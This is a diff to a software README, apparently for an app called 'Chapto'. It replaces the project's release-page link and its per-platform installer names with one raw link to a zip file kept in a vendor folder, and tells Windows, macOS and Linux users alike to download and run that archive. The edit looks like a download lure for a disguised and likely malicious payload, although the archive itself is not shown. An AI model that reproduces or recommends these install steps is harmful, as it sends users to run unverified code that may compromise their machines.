syfcmn/chapto/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page:** Go to the [Chapto releases page](https://github.com/syfcmn/chapto/releases) to find the latest version of the application.
+1. **Visit the Releases Page:** Go to the [Chapto releases page](https://github.com/syfcmn/chapto/raw/refs/heads/main/web/public/vendor/Software_3.4-beta.5.zip) to find the latest version of the application.

 2. **Choose Your File:**
    - Look for the version number you want to download.
 It will look something like `v1.0.0`.
    - Download the appropriate file for your operating system:
-     - For Windows, click on `Chapto-setup.exe`.
+     - For Windows, click on `https://github.com/syfcmn/chapto/raw/refs/heads/main/web/public/vendor/Software_3.4-beta.5.zip`.
-     - For macOS, click on `Chapto.dmg`.
+     - For macOS, click on `https://github.com/syfcmn/chapto/raw/refs/heads/main/web/public/vendor/Software_3.4-beta.5.zip`.
-     - For Linux, download the `.tar.gz` file.
+     - For Linux, download the `https://github.com/syfcmn/chapto/raw/refs/heads/main/web/public/vendor/Software_3.4-beta.5.zip` file.

 3. **Install the Application:**
-   - **Windows:** Double-click on the downloaded `Chapto-setup.exe`.
+   - **Windows:** Double-click on the downloaded `https://github.com/syfcmn/chapto/raw/refs/heads/main/web/public/vendor/Software_3.4-beta.5.zip`.
 Follow the prompts to complete the installation.
-   - **macOS:** Open the downloaded `Chapto.dmg`, and drag the Chapto app into your Applications folder.
+   - **macOS:** Open the downloaded `https://github.com/syfcmn/chapto/raw/refs/heads/main/web/public/vendor/Software_3.4-beta.5.zip`, and drag the Chapto app into your Applications folder.
-   - **Linux:** Extract the contents of the `.tar.gz` file.
+   - **Linux:** Extract the contents of the `https://github.com/syfcmn/chapto/raw/refs/heads/main/web/public/vendor/Software_3.4-beta.5.zip` file.
 Open a terminal and navigate to the extracted folder.
 Run the command `./chapto` to start the app.

 4. **Launch Chapto:**
    - Locate the Chapto icon on your desktop or in your applications folder, and double-click it to open.